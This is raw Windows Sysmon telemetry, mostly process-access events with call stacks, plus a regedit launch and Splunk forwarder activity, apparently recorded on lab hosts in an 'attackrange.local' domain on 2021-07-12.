08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F6A4-60EB-A07D-00000000CF01}7440C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:36.718{466BC892-32D3-60E8-770B-00000000CF01}63563140C:\Windows\Explorer.EXE{466BC892-F6A4-60EB-A07D-00000000CF01}7440C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+3d503|C:\Windows\System32\SHELL32.dll+3d3cb|C:\Windows\System32\SHELL32.dll+3cce7|C:\Windows\System32\SHELL32.dll+3c9ac|C:\Windows\System32\SHELL32.dll+122467|C:\Windows\System32\SHELL32.dll+1223c5 154100x80000000000000001052056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.687{466BC892-F6A4-60EB-A07D-00000000CF01}7440C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXE"C:\Windows\regedit.exe" C:\Users\bob\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61AC30FF82D8E122BB8302F0FBF17D5F,SHA256=169ED99AF4D518C840A540E86226196C97E50AD6F92AC98A607621C8779D212F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:37.465{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D87309E393721177A3F240DB66CDAEE,SHA256=0A7263E6FF4397BBE1BA235C70FD6AE864CEF504320C576AADD1CE3EA0C35E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.750{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8747C465A75458984FE2E5A23E2AD370,SHA256=308C3A1CF4CE39501919F5BB03B879F20F8C2395F1B3772AB0A870028C37AF9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.750{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93CF72DAEF49F1A44EFC0DF9D3456C94,SHA256=6FC18F2166A6AF940D3508507DCF10FAD4508C873842725A66F341B229C46155,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:29.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51148-false10.0.1.12-8000- 10341000x80000000000000001052115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.450{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.435{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 